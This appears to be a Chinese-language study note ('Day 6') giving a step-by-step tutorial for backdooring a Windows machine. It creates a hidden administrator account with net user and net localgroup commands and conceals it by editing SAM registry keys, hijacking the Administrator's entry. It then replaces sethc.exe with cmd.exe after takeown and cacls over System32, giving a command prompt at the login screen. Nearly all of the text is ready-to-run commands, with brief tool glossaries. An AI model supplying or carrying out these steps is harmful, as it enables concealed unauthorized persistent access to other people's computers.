第六天(设置隐藏用户留后门)
- 1.建立账户提升权限运行账户
- 调出命令,输入net user kun$ 123 /add 新建名为kun 密码为123的用户
-
- 输入net localgroup administrators kun$ /add 提升kun用户权限至管理级
-
- 输入net user kun$ /active:yes 激活kun用户
-
- 使用命令行查不到kun用户
- 2.此时命令行下是看不见隐藏用户的,但打开计算机管理,在本地用户和组,发现可以看到刚刚创建的隐藏用户,需要通过修改注册表,隐藏新建隐藏用户
- win+r:输入regedit,调出注册表编辑器,找到HKEY_LOCAL_MACHINE\SAM\SAM,点击右键,选择“权限,将Administered用户权限设置成完全控制,然后确定
-
- 重新进入注册表就能看见SAM路径下的文件,按照路径HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names,找到kun用户,和对应的000003E9,将kun$用户和对应的键000003E9导出到桌面,然后找到Administered对应的键000001F4也导出到桌面
-
- 用命令行命令net user kun$ /del 删除kun用户信息及权限信息
-
- 将Administrator所在权限注册表处替换此前创建隐藏用户kun
-
- 将替换后的用户权限及用户文件用注册表编辑器打开并添加进注册表中
-
- 打开计算机管理和注册表,能看见kun用户只存在于注册表里,并没有在计算机管理用户组里面
- 3.生成后门
- 在Windows系统下连续按5次shift键后,系统就会执行C:\Windows\System32下的sethc.exe,也就是启用了沾滞键,利用命令takeown /f c:\windows\system32\*.* /a /r /d y拿下C:\Windows\System32下的文件权限
-
- 利用cacls c:\windows\system32\*.* /T /E /G administrators:F命令取得取整个文件夹及其下面子目录文件的所属权
-
- 拿到权限后用指令attribe -s -r -h sethc.exe 及copy cmd.exe sethc.exe修改sethc.exe的读写以及系统文件归属,将cmd覆盖sethc.exe
-
- 登录界面五次shift成功弹出cmd。
-
- 注:
- Takeown是Windows操作系统中的一个命令行工具,用于获取对文件或文件夹的所有权。使用该命令可以修改文件或文件夹的所有者,以便对其执行一些特殊操作。
- Cacls是Windows操作系统中的另一个命令行工具,用于修改或查看文件或文件夹的访问控制列表(ACL)。通过Cacls命令,可以授予或撤销用户对文件或文件夹的访问权限。
- Attrib是Windows操作系统中的命令行工具,用于修改文件或文件夹的属性。通过Attrib命令,可以更改文件或文件夹的属性,例如只读、隐藏或系统属性等。
- 注: